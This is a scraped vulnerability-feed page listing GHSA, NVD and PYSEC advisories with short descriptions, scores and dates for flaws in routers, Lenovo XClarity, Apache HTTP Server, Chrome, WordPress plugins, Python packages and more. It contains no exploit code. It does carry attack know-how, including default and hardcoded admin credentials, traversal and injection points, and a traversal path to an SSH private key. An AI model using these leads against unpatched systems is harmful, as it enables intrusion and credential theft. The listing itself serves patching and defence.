Recent vulnerabilities
| ID | Description |
|---|---|
| ghsa-64jh-cjwc-w8q6 (github) | In snapd versions prior to 2.62, snapd failed to properly check the file type when extracting a snap. The snap format is a squashfs file-system image and so can contain files that are non-regular files (such as pipes or sockets etc). Various file entries within the snap squashfs image (such as icons etc) are directly read by snapd when it is extracted. An attacker who could convince a user to install a malicious snap which contained non-regular files at these paths could then cause snapd to block indefinitely trying to read from such files and cause a denial of service. |
| ghsa-x3wg-9gxm-mq7c (github) | A privilege escalation vulnerability was discovered in XCC that could allow an authenticated XCC user with elevated privileges to perform command injection via specially crafted IPMI commands. |
| ghsa-q6hr-rj2r-76hq (github) | A privilege escalation vulnerability was discovered in an upload processing functionality of XCC that could allow an authenticated XCC user with elevated privileges to perform command injection via specially crafted file uploads. |
| ghsa-mjh6-hm62-6x3r (github) | An issue in Solar-Log 1000 before v2.8.2 and build 52-23.04.2013 was discovered to store plaintext passwords in the export.html, email.html, and sms.html files. |
| ghsa-j568-5hjm-gq5g (github) | An improper validation vulnerability was reported in the Lenovo Tab K10 that could allow a specially crafted application to keep the device on. |
| ghsa-cm9f-fpj4-64q9 (github) | Directory Traversal vulnerability in Severalnines Cluster Control 1.9.8 before 1.9.8-9778, 2.0.0 before 2.0.0-9779, and 2.1.0 before 2.1.0-9780 allows a remote attacker to include and display file content in an HTTP request via the CMON API. |
| ghsa-9p47-x6rm-qgxw (github) | Incorrect access control in Solar-Log 1000 before v2.8.2 and build 52- 23.04.2013 allows attackers to obtain Administrative privileges via connecting to the web administration server. |
| ghsa-vgj9-34jq-3c7h (github) | SPX (aka php-spx) through 0.4.15 allows SPX_UI_URI Directory Traversal to read arbitrary files. |
| ghsa-p449-q86c-mx7r (github) | An issue was discovered in Italtel Embrace 1.6.4. The web application inserts cleartext passwords in the HTML source code. An authenticated user is able to edit the configuration of the email server. Once the user access the edit function, the web application fills the edit form with the current credentials for the email account, including the cleartext password. |
| ghsa-m24x-wx9p-jqmh (github) | It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. |
| ghsa-jpv7-733x-p7qw (github) | A privilege escalation vulnerability was discovered in XCC that could allow an authenticated XCC user with elevated privileges to execute arbitrary code via a specially crafted IPMI command. |
| ghsa-jm9w-pgx2-583g (github) | Multiple stored cross-site scripting (XSS) vulnerabilities on AdTran NetVanta 3120 18.01.01.00.E devices allow remote attackers to inject arbitrary JavaScript, as demonstrated by /mainPassword.html, /processIdentity.html, /public.html, /dhcp.html, /private.html, /hostname.html, /connectivity.html, /NetworkMonitor.html, /trafficMonitoringConfig.html, and /wizardMain.html. |
| ghsa-jcxv-6f65-7hrx (github) | Microsoft Exchange Server Security Feature Bypass Vulnerability |
| ghsa-gmxf-67jf-rrf4 (github) | The TELNET service of AdTran NetVanta 3120 18.01.01.00.E devices is enabled by default, and has default credentials for a root-level account. |
| ghsa-fgq9-p33g-xcfc (github) | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. |
| ghsa-cf6v-2gfq-gj95 (github) | Use after free in V8 in Google Chrome prior to 94.0.4606.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. |
| ghsa-c9r9-7qcg-7h37 (github) | Inappropriate implementation in Memory in Google Chrome prior to 94.0.4606.71 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. |
| ghsa-9p3q-q3jf-q5p4 (github) | A privilege escalation vulnerability was discovered in the SSH captive command shell interface that could allow an authenticated XCC user with elevated privileges to perform command injection via specially crafted file uploads. |
| ghsa-9953-mrch-gvmc (github) | A privilege escalation vulnerability was discovered in the web interface or SSH captive command shell interface of XCC that could allow an authenticated XCC user with elevated privileges to perform command injection via a specially crafted request. |
| ghsa-7qxh-m238-859c (github) | An issue was discovered in LIVEBOX Collaboration vDesk through v018. A Bypass of Two-Factor Authentication can occur under the /login/backup_code endpoint and the /api/v1/vdeskintegration/createbackupcodes endpoint, because the application allows a user to generate or regenerate the backup codes before checking the TOTP. |
| ghsa-7pph-hp2f-gxfg (github) | Use after free in Indexed DB API in Google Chrome prior to 93.0.4577.82 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. |
| ghsa-5527-m9v4-67gx (github) | Certain functionality in OpenText Vertica Management console might be prone to bypass via crafted requests. The vulnerability would affect one of Vertica’s authentication functionalities by allowing specially crafted requests and sequences. This issue impacts the following Vertica Management Console versions: 10.x 11.1.1-24 or lower 12.0.4-18 or lower Please upgrade to one of the following Vertica Management Console versions: 10.x to upgrade to latest versions from below. 11.1.1-25 12.0.4-19 23.x 24.x |
| ghsa-38c8-mw66-j237 (github) | Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. |
| ghsa-29h7-gr57-5f8r (github) | A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. |
| ghsa-w774-7g7w-83fx (github) | The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020. |
| ghsa-hf6r-r2hj-f2g7 (github) | Use after free in Blink in Google Chrome prior to 89.0.4389.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. |
| ghsa-75g4-7255-wxgc (github) | A spoofing vulnerability exists when Windows incorrectly validates file signatures, aka 'Windows Spoofing Vulnerability'. |
| ghsa-59jx-m3c4-2m9w (github) | Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to login to the ssh server or web interface with admin privileges. |
| ghsa-66fw-43h8-f8p3 (github) | Affected versions of the crate failed to catch C++ exceptions raised within the `XmpFile::close` function. If such an exception occured, it would trigger undefined behavior, typically a process abort. This is best demonstrated in [issue #230](https://github.com/adobe/xmp-toolkit-rs/issues/230), where a race condition causes the `close` call to fail due to file I/O errors. This was fixed in [PR #232](https://github.com/adobe/xmp-toolkit-rs/pull/232) (released as crate version 1.9.0), which now safely handles the exception. For backward compatibility, the existing API ignores the error. A new API `XmpFile::try_close` was added to allow callers to receive and process the error result. Users of all prior versions of `xmp_toolkit` are encouraged to update to version 1.9.0 to avoid undefined behavior. |
| ghsa-xrwv-x9mf-8rh3 (github) | Zohocorp ManageEngine Exchange Reporter Plus versions 5717 and below are vulnerable to the authenticated SQL injection in the reports module. |
| ID | CVSS Base Score | Description | Vendor | Product | Publish Date | Update Date |
|---|---|---|---|---|---|---|
| cve-2024-38437 (NVD) | CVSS-v3.1: 9.8 | D-Link - CWE-288: Authentication Bypass Using an Alternate Path or Channel |
D-Link |
DSL-225 |
2024-07-21T07:17:40.752Z | 2024-07-26T20:35:11.435Z |
| cve-2024-25428 (NVD) | N/A | SQL Injection vulnerability in MRCMS v3.1.2 allows attackers to run arbitrary system commands via the status parameter. |
n/a |
n/a |
2024-02-20T00:00:00 | 2024-07-26T20:30:11.804Z |
| cve-2024-3144 (NVD) | DedeCMS makehtml_spec.php cross-site request forgery |
n/a |
DedeCMS |
2024-04-02T01:00:04.567Z | 2024-07-26T20:29:49.999Z | |
| cve-2024-41628 (NVD) | N/A | Directory Traversal vulnerability in Severalnines Cluster Control 1.9.8 before 1.9.8-9778, 2.0.0 before 2.0.0-9779, and 2.1.0 before 2.1.0-9780 allows a remote attacker to include and display file content in an HTTP request via the CMON API. |
n/a |
n/a |
2024-07-26T00:00:00 | 2024-07-26T20:28:12.581023 |
| cve-2024-25198 (NVD) | N/A | Inappropriate pointer order of laser_scan_filter_.reset() and tf_listener_.reset() (amcl_node.cpp) in Open Robotics Robotic Operating Sytstem 2 (ROS2) and Nav2 humble versions leads to a use-after-free. |
n/a |
n/a |
2024-02-20T00:00:00 | 2024-07-26T20:27:49.222Z |
| cve-2024-6560 (NVD) | Addonify – Quick View For WooCommerce <= 1.2.16 - Unauthenticated Full Path Dislcosure |
addonify |
Addonify – Quick View For WooCommerce |
2024-07-20T02:37:15.065Z | 2024-07-26T20:25:32.653Z | |
| cve-2024-5372 (NVD) | Kashipara College Management System submit_extracurricular_activity.php cross site scripting |
Kashipara |
College Management System |
2024-05-26T18:31:03.943Z | 2024-07-26T20:25:31.312Z | |
| cve-2016-10180 (NVD) | N/A | An issue was discovered on the D-Link DWR-932B router. WPS PIN generation is based on srand(time(0)) seeding. |
n/a |
n/a |
2017-01-30T04:24:00 | 2024-07-26T20:25:12.426Z |
| cve-2024-40318 (NVD) | N/A | An arbitrary file upload vulnerability in Webkul Qloapps v1.6.0.0 allows attackers to execute arbitrary code via uploading a crafted file. |
n/a |
n/a |
2024-07-25T00:00:00 | 2024-07-26T20:24:47.036Z |
| cve-2024-4093 (NVD) | SourceCodester Simple Subscription Website view_application.php sql injection |
SourceCodester |
Simple Subscription Website |
2024-04-24T01:00:07.384Z | 2024-07-26T20:24:38.368Z | |
| cve-2022-25151 (NVD) | ITarian - Session cookie not protected by HttpOnly flag |
ITarian |
ITarian SaaS platform / on-premise |
2022-02-23T00:00:00 | 2024-07-26T20:23:45.437Z | |
| cve-2024-33218 (NVD) | N/A | An issue in the component AsUpIO64.sys of ASUSTeK Computer Inc ASUS USB 3.0 Boost Storage Driver 5.30.20.0 allows attackers to escalate privileges and execute arbitrary code via sending crafted IOCTL requests. |
n/a |
n/a |
2024-07-26T20:21:57.569Z | |
| cve-2024-41492 (NVD) | N/A | A stack overflow in Tenda AX1806 v1.0.0.1 allows attackers to cause a Denial of Service (DoS) via a crafted input. |
n/a |
n/a |
2024-07-19T00:00:00 | 2024-07-26T20:21:05.886Z |
| cve-2024-41466 (NVD) | N/A | Tenda FH1201 v1.2.0.14 was discovered to contain a stack-based buffer overflow vulnerability via the page parameter at ip/goform/NatStaticSetting. |
n/a |
n/a |
2024-07-24T00:00:00 | 2024-07-26T20:20:25.639Z |
| cve-2024-38288 (NVD) | N/A | A command-injection issue in the Certificate Signing Request (CSR) functionality in R-HUB TurboMeeting through 8.x allows authenticated attackers with administrator privileges to execute arbitrary commands on the underlying server as root. |
n/a |
n/a |
2024-07-25T00:00:00 | 2024-07-26T20:19:06.050Z |
| cve-2024-24623 (NVD) | CVSS-v3.1: 8.8 CVSS-v2.0: 9 | Softaculous Webuzo FTP Management Command Injection |
Softaculous |
Webuzo |
2024-07-25T21:44:51.964Z | 2024-07-26T20:18:38.420Z |
| cve-2024-35296 (NVD) | Apache Traffic Server: Invalid Accept-Encoding can force forwarding requests |
Apache Software Foundation |
Apache Traffic Server |
2024-07-26T09:11:11.221Z | 2024-07-26T20:18:13.746Z | |
| cve-2024-1833 (NVD) | SourceCodester Employee Management System login.php sql injection |
SourceCodester |
Employee Management System |
2024-02-23T19:31:06.771Z | 2024-07-26T20:17:35.383Z | |
| cve-2024-2059 (NVD) | SourceCodester Petrol Pump Management Software service_crud.php unrestricted upload |
SourceCodester |
Petrol Pump Management Software |
2024-03-01T11:31:05.750Z | 2024-07-26T20:17:20.242Z | |
| cve-2024-2072 (NVD) | SourceCodester Flashcard Quiz App update-flashcard.php cross site scripting |
SourceCodester |
Flashcard Quiz App |
2024-03-01T17:00:06.711Z | 2024-07-26T20:16:50.554Z | |
| cve-2024-7128 (NVD) | CVSS-v3.1: 5.3 | Openshift-console: unauthenticated data exposure |
Red Hat Red Hat |
Red Hat OpenShift Container Platform 3.11 Red Hat OpenShift Container Platform 4 |
2024-07-26T13:34:19.647Z | 2024-07-26T20:16:49.987Z |
| cve-2024-41116 (NVD) | Remote code execution in streamlit geospatial in pages/1_📷_Timelapse.py MODIS Ocean Color SMI option vis_params |
opengeos |
streamlit-geospatial |
2024-07-26T20:16:24.561Z | 2024-07-26T20:16:24.561Z | |
| cve-2024-36755 (NVD) | N/A | D-Link DIR-1950 up to v1.11B03 does not validate SSL certificates when requesting the latest firmware version and downloading URL. This can allow attackers to downgrade the firmware version or change the downloading URL via a man-in-the-middle attack. |
n/a |
n/a |
2024-06-27T00:00:00 | 2024-07-26T20:16:23.632Z |
| cve-2024-28854 (NVD) | Slow loris vulnerability with default configuration in tls-listener |
tmccombs |
tls-listener |
2024-03-15T18:54:58.524Z | 2024-07-26T20:16:16.669Z | |
| cve-2023-7052 (NVD) | PHPGurukul Online Notes Sharing System profile.php cross-site request forgery |
PHPGurukul |
Online Notes Sharing System |
2023-12-22T01:00:05.458Z | 2024-07-26T20:15:49.657Z | |
| cve-2024-31808 (NVD) | N/A | TOTOLINK EX200 V4.0.3c.7646_B20201211 was discovered to contain a remote code execution (RCE) vulnerability via the webWlanIdx parameter in the setWebWlanIdx function. |
n/a |
n/a |
2024-04-08T00:00:00 | 2024-07-26T20:15:45.115Z |
| cve-2024-25801 (NVD) | N/A | SKINsoft S-Museum 7.02.3 allows XSS via the filename of an uploaded file. Unlike in CVE-2024-25802, the attack payload is in the name (not the content) of a file. |
n/a |
n/a |
2024-02-22T00:00:00 | 2024-07-26T20:15:08.933Z |
| cve-2023-24330 (NVD) | N/A | Command Injection vulnerability in D-Link Dir 882 with firmware version DIR882A1_FW130B06 allows attackers to run arbitrary commands via crafted POST request to /HNAP1/. |
n/a |
n/a |
2024-02-21T00:00:00 | 2024-07-26T20:14:31.143Z |
| cve-2023-52040 (NVD) | N/A | An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_41284C function. |
n/a |
n/a |
2024-01-24T00:00:00 | 2024-07-26T20:13:49.426Z |
| cve-2024-41115 (NVD) | Remote code execution in streamlit geospatial in pages/1_📷_Timelapse.py MODIS Ocean Color SMI option palette |
opengeos |
streamlit-geospatial |
2024-07-26T20:13:35.684Z | 2024-07-26T20:13:35.684Z |
| ID | CVSS Base Score | Description | Vendor | Product | Publish Date | Update Date |
|---|---|---|---|---|---|---|
| cve-2024-28093 (NVD) | N/A | **UNSUPPORTED WHEN ASSIGNED** The TELNET service of AdTran NetVanta 3120 18.01.01.00.E devices is enabled by default, and has default credentials for a root-level account. |
n/a |
n/a |
2024-03-26T00:00:00 | 2024-07-26T21:06:15.336868 |
| cve-2024-24623 (NVD) | CVSS-v3.1: 8.8 CVSS-v2.0: 9 | Softaculous Webuzo FTP Management Command Injection |
Softaculous |
Webuzo |
2024-07-25T21:44:51.964Z | 2024-07-26T20:18:38.420Z |
| cve-2023-39667 (NVD) | N/A | D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the param_2 parameter in the FUN_0000acb4 function. |
n/a |
n/a |
2023-08-18T00:00:00 | 2024-07-26T20:11:55.999Z |
| cve-2021-3182 (NVD) | N/A | D-Link DCS-5220 devices have a buffer overflow. NOTE: This vulnerability only affects products that are no longer supported by the maintainer |
n/a |
n/a |
2021-01-19T14:40:57 | 2024-07-26T20:10:05.925Z |
| cve-2024-4786 (NVD) | CVSS-v3.1: 2.8 | An improper validation vulnerability was reported in the Lenovo Tab K10 that could allow a specially crafted application to keep the device on. |
Lenovo |
Tab K10 |
2024-07-26T19:45:41.260Z | 2024-07-26T19:45:41.260Z |
| cve-2024-41113 (NVD) | Remote code execution in streamlit geospatial in pages/1_📷_Timelapse.py Any Earth Engine ImageCollection option vis_params |
opengeos |
streamlit-geospatial |
2024-07-26T20:05:58.360Z | 2024-07-26T20:05:58.360Z | |
| cve-2024-41112 (NVD) | Remote code execution in streamlit geospatial in pages/1_📷_Timelapse.py Any Earth Engine ImageCollection option palette |
opengeos |
streamlit-geospatial |
2024-07-26T20:01:37.903Z | 2024-07-26T20:04:27.922Z | |
| cve-2024-40117 (NVD) | N/A | Incorrect access control in Solar-Log 1000 before v2.8.2 and build 52- 23.04.2013 allows attackers to obtain Administrative privileges via connecting to the web administration server. |
n/a |
n/a |
2024-07-26T00:00:00 | 2024-07-26T19:15:15.177002 |
| cve-2024-40116 (NVD) | N/A | An issue in Solar-Log 1000 before v2.8.2 and build 52-23.04.2013 was discovered to store plaintext passwords in the export.html, email.html, and sms.html files. |
n/a |
n/a |
2024-07-26T00:00:00 | 2024-07-26T19:17:38.200023 |
| cve-2024-38512 (NVD) | CVSS-v3.1: 7.2 | A privilege escalation vulnerability was discovered in XCC that could allow an authenticated XCC user with elevated privileges to perform command injection via specially crafted IPMI commands. |
Lenovo |
XClarity Controller |
2024-07-26T19:45:31.829Z | 2024-07-26T19:45:31.829Z |
| cve-2024-38511 (NVD) | CVSS-v3.1: 7.2 | A privilege escalation vulnerability was discovered in an upload processing functionality of XCC that could allow an authenticated XCC user with elevated privileges to perform command injection via specially crafted file uploads. |
Lenovo |
XClarity Controller |
2024-07-26T19:45:21.293Z | 2024-07-26T19:45:21.293Z |
| cve-2024-38510 (NVD) | CVSS-v3.1: 7.2 | A privilege escalation vulnerability was discovered in the SSH captive command shell interface that could allow an authenticated XCC user with elevated privileges to perform command injection via specially crafted file uploads. |
Lenovo |
XClarity Controller |
2024-07-26T19:45:12.150Z | 2024-07-26T19:45:12.150Z |
| cve-2024-38509 (NVD) | CVSS-v3.1: 7.2 | A privilege escalation vulnerability was discovered in XCC that could allow an authenticated XCC user with elevated privileges to execute arbitrary code via a specially crafted IPMI command. |
Lenovo |
XClarity Controller |
2024-07-26T19:45:01.471Z | 2024-07-26T19:45:01.471Z |
| cve-2024-38508 (NVD) | CVSS-v3.1: 7.2 | A privilege escalation vulnerability was discovered in the web interface or SSH captive command shell interface of XCC that could allow an authenticated XCC user with elevated privileges to perform command injection via a specially crafted request. |
Lenovo |
XClarity Controller |
2024-07-26T19:44:50.100Z | 2024-07-26T19:44:50.100Z |
| cve-2024-24478 (NVD) | N/A | An issue in Wireshark before 4.2.0 allows a remote attacker to cause a denial of service via the packet-bgp.c, dissect_bgp_open(tvbuff_t*tvb, proto_tree*tree, packet_info*pinfo), optlen components. NOTE: this is disputed by the vendor because neither release 4.2.0 nor any other release was affected. |
n/a |
n/a |
2024-02-21T00:00:00 | 2024-07-26T19:56:52.814Z |
| cve-2021-1647 (NVD) | CVSS-v3.1: 7.8 | Microsoft Defender Remote Code Execution Vulnerability |
Microsoft Microsoft Microsoft Microsoft Microsoft |
Microsoft System Center Endpoint Protection Microsoft System Center 2012 R2 Endpoint Protection Microsoft Security Essentials Microsoft System Center 2012 Endpoint Protection Windows Defender |
2021-01-12T19:42:01 | 2023-12-29T22:46:02.290Z |
| cve-2021-21193 (NVD) | N/A | Use after free in Blink in Google Chrome prior to 89.0.4389.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. |
Google |
Chrome |
2021-03-16T14:10:18 | 2021-05-01T01:07:55 |
| cve-2021-22506 (NVD) | N/A | Advance configuration exposing Information Leakage vulnerability in Micro Focus Access Manager product, affects all versions prior to version 5.0. The vulnerability could cause information leakage. |
n/a |
Access Manager. |
2021-03-26T13:37:22 | 2021-03-26T13:37:22 |
| cve-2021-1870 (NVD) | N/A | A logic issue was addressed with improved restrictions. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, iOS 14.4 and iPadOS 14.4. A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. |
Apple Apple |
iOS and iPadOS macOS |
2021-04-02T18:06:42 | 2021-05-01T01:06:25 |
| cve-2021-1871 (NVD) | N/A | A logic issue was addressed with improved restrictions. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, iOS 14.4 and iPadOS 14.4. A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. |
Apple Apple |
iOS and iPadOS macOS |
2021-04-02T18:06:58 | 2021-05-30T23:06:12 |
| cve-2020-1380 (NVD) | CVSS-v3.1: 7.8 | Scripting Engine Memory Corruption Vulnerability |
Microsoft |
Internet Explorer 11 |
2020-08-17T19:13:00 | 2024-05-29T16:32:47.208Z |
| cve-2020-1464 (NVD) | CVSS-v3.1: 7.8 | Windows Spoofing Vulnerability |
Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft Microsoft |
Windows 10 Version 1803 Windows 10 Version 1809 Windows Server 2019 Windows Server 2019 (Server Core installation) Windows 10 Version 1909 Windows Server, version 1909 (Server Core installation) Windows 10 Version 1709 for 32-bit Systems Windows 10 Version 1709 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, version 1903 (Server Core installation) Windows 10 Version 2004 Windows Server version 2004 Windows 10 Version 1507 Windows 10 Version 1607 Windows Server 2016 Windows Server 2016 (Server Core installation) Windows 7 Windows 7 Service Pack 1 Windows 8.1 Windows Server 2008 Service Pack 2 Windows Server 2008 Service Pack 2 (Server Core installation) Windows Server 2008 Service Pack 2 Windows Server 2008 R2 Service Pack 1 Windows Server 2008 R2 Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) |
2020-08-17T19:13:03 | 2024-05-29T16:32:23.703Z |
| cve-2020-3566 (NVD) | Cisco IOS XR Software DVMRP Memory Exhaustion Vulnerability |
Cisco |
Cisco IOS XR Software |
2020-08-29T00:00:00 | 2020-08-29T15:15:13 | |
| cve-2020-25213 (NVD) | The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020. |
n/a |
n/a |
2020-09-09T00:00:00 | 2023-04-03T00:00:00 | |
| cve-2020-0878 (NVD) | CVSS-v3.1: 4.2 | Microsoft Browser Memory Corruption Vulnerability |
Microsoft Microsoft Microsoft Microsoft |
ChakraCore Microsoft Edge (EdgeHTML-based) Internet Explorer 9 Internet Explorer 11 |
2020-09-11T17:08:26 | 2023-12-31T21:34:24.471Z |
| cve-2020-16846 (NVD) | N/A | An issue was discovered in SaltStack Salt through 3002. Sending crafted web requests to the Salt API, with the SSH client enabled, can result in shell injection. |
n/a |
n/a |
2020-11-06T07:27:24 | 2022-01-03T21:06:05 |
| cve-2020-17144 (NVD) | CVSS-v3.1: 8.4 | Microsoft Exchange Remote Code Execution Vulnerability |
Microsoft |
Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 31 |
2020-12-09T23:36:55 | 2023-12-31T17:59:51.224Z |
| cve-2020-29583 (NVD) | N/A | Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to login to the ssh server or web interface with admin privileges. |
n/a |
n/a |
2020-12-22T00:00:00 | 2023-10-28T00:43:07.540036 |
| cve-2021-41773 (NVD) | Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 |
Apache Software Foundation |
Apache HTTP Server |
2021-10-05T08:40:12 | 2022-08-14T01:06:21 | |
| cve-2021-42013 (NVD) | Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) |
Apache Software Foundation |
Apache HTTP Server |
2021-10-07T15:50:14 | 2022-08-14T01:06:15 |
| ID | Description |
|---|---|
| pysec-2023-256 | A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability. |
| pysec-2023-255 | Command Injection in GitHub repository gradio-app/gradio prior to main. |
| pysec-2024-41 | diffoscope before 256 allows directory traversal via an embedded filename in a GPG file. Contents of any file, such as ../.ssh/id_rsa, may be disclosed to an attacker. This occurs because the value of the gpg --use-embedded-filenames option is trusted. |
| pysec-2024-40 | orjson.loads in orjson before 3.9.15 does not limit recursion for deeply nested JSON documents. |
| pysec-2024-39 | Versions of the package fastecdsa before 2.3.2 are vulnerable to Use of Uninitialized Variable on the stack, via the curvemath_mul function in src/curveMath.c, due to being used and interpreted as user-defined type. Depending on the variable's actual value it could be arbitrary free(), arbitrary realloc(), null pointer dereference and other. Since the stack can be controlled by the attacker, the vulnerability could be used to corrupt allocator structure, leading to possible heap exploitation. The attacker could cause denial of service by exploiting this vulnerability. |
| pysec-2023-254 | cryptography is a package designed to expose cryptographic primitives and recipes to Python developers. Calling `load_pem_pkcs7_certificates` or `load_der_pkcs7_certificates` could lead to a NULL-pointer dereference and segfault. Exploitation of this vulnerability poses a serious risk of Denial of Service (DoS) for any application attempting to deserialize a PKCS7 blob/certificate. The consequences extend to potential disruptions in system availability and stability. This vulnerability has been patched in version 41.0.6. |
| pysec-2024-38 | FastAPI is a web framework for building APIs with Python 3.8+ based on standard Python type hints. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that process can't handle any more requests. It's a ReDoS(Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This vulnerability has been patched in version 0.109.1. |
| pysec-2024-37 | nonebot2 is a cross-platform Python asynchronous chatbot framework written in Python. This security advisory pertains to a potential information leak (e.g., environment variables) in instances where developers utilize `MessageTemplate` and incorporate user-provided data into templates. The identified vulnerability has been remedied in pull request #2509 and will be included in versions released from 2.2.0. Users are strongly advised to upgrade to these patched versions to safeguard against the vulnerability. A temporary workaround involves filtering underscores before incorporating user input into the message template. |
| pysec-2022-43059 | AIOHTTP 3.8.1 can report a "ValueError: Invalid IPv6 URL" outcome, which can lead to a Denial of Service (DoS). NOTE: multiple third parties dispute this issue because there is no example of a context in which denial of service would occur, and many common contexts have exception handing in the calling application |
| pysec-2024-36 | An information disclosure flaw was found in ansible-core due to a failure to respect the ANSIBLE_NO_LOG configuration in some scenarios. It was discovered that information is still included in the output in certain tasks, such as loop items. Depending on the task, this issue may include sensitive information, such as decrypted secret values. |
| pysec-2023-253 | Path Traversal: '\..\filename' in GitHub repository mlflow/mlflow prior to 2.9.2. |
| pysec-2024-35 | Versions of the package dash-core-components before 2.13.0; all versions of the package dash-core-components; versions of the package dash before 2.15.0; all versions of the package dash-html-components; versions of the package dash-html-components before 2.0.16 are vulnerable to Cross-site Scripting (XSS) when the href of the a tag is controlled by an adversary. An authenticated attacker who stores a view that exploits this vulnerability could steal the data that's visible to another user who opens that view - not just the data already included on the page, but they could also, in theory, make additional requests and access other data accessible to this user. In some cases, they could also steal the access tokens of that user, which would allow the attacker to act as that user, including viewing other apps and resources hosted on the same server. **Note:** This is only exploitable in Dash apps that include some mechanism to store user input to be reloaded by a different user. |
| pysec-2024-12 | LlamaIndex (aka llama_index) through 0.9.34 allows SQL injection via the Text-to-SQL feature in NLSQLTableQueryEngine, SQLTableRetrieverQueryEngine, NLSQLRetriever, RetrieverQueryEngine, and PGVectorSQLQueryEngine. For example, an attacker might be able to delete this year's student records via "Drop the Students table" within English language input. |
| pysec-2024-34 | The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). Nodes and servers get a ssh config by default that permits root login with password authentication. In a proper deployment, the SSH service is not exposed so there is no risk, but not all deployments are ideal. The default should therefore be less permissive. The vulnerability can be mitigated by removing the ssh part from the docker file and rebuilding the docker image. Version 4.2.0 patches the vulnerability. |
| pysec-2024-33 | The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). Nodes and servers get a ssh config by default that permits root login with password authentication. In a proper deployment, the SSH service is not exposed so there is no risk, but not all deployments are ideal. The default should therefore be less permissive. The vulnerability can be mitigated by removing the ssh part from the docker file and rebuilding the docker image. Version 4.2.0 patches the vulnerability. |
| pysec-2024-32 | The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). There are no checks on whether the input is encrypted if a task is created in an encrypted collaboration. Therefore, a user may accidentally create a task with sensitive input data that will then be stored unencrypted in a database. Users should ensure they set the encryption setting correctly. This vulnerability is patched in 4.2.0. |
| pysec-2024-31 | The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). It is possible to find out usernames from the response time of login requests. This could aid attackers in credential attacks. Version 4.2.0 patches this vulnerability. |
| pysec-2024-30 | The vantage6 technology enables to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC). Prior to 4.2.0, authenticated users could inject code into algorithm environment variables, resulting in remote code execution. This vulnerability is patched in 4.2.0. |
